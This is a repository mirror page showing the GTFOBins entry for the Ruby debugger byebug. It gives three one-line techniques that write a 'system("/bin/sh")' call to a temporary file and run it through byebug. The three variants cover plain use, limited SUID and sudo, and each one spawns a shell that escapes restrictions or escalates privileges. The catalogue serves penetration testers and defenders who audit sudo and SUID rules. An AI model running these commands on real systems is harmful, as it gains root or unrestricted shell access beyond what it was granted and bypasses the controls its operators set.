This website requires JavaScript.
Explore
Help
Register
Sign In
mirror
/
GTFOBins.github.io
Watch
1
Star
0
Fork
0
You've already forked GTFOBins.github.io
mirror of
https://github.com/GTFOBins/GTFOBins.github.io.git
synced
2026-01-02 13:41:39 +01:00
Code
Issues
90960c8ea4
GTFOBins.github.io
/
_gtfobins
/
byebug.md
bcoles
efb956a7b1
Create byebug.md
2020-03-17 20:12:46 +01:00
389 B
Raw
Blame
History
functions
shell
limited-suid
sudo
code
TF=$(mktemp) echo 'system("/bin/sh")' > $TF byebug $TF continue
code
TF=$(mktemp) echo 'system("/bin/sh")' > $TF ./byebug $TF continue
code
TF=$(mktemp) echo 'system("/bin/sh")' > $TF sudo byebug $TF continue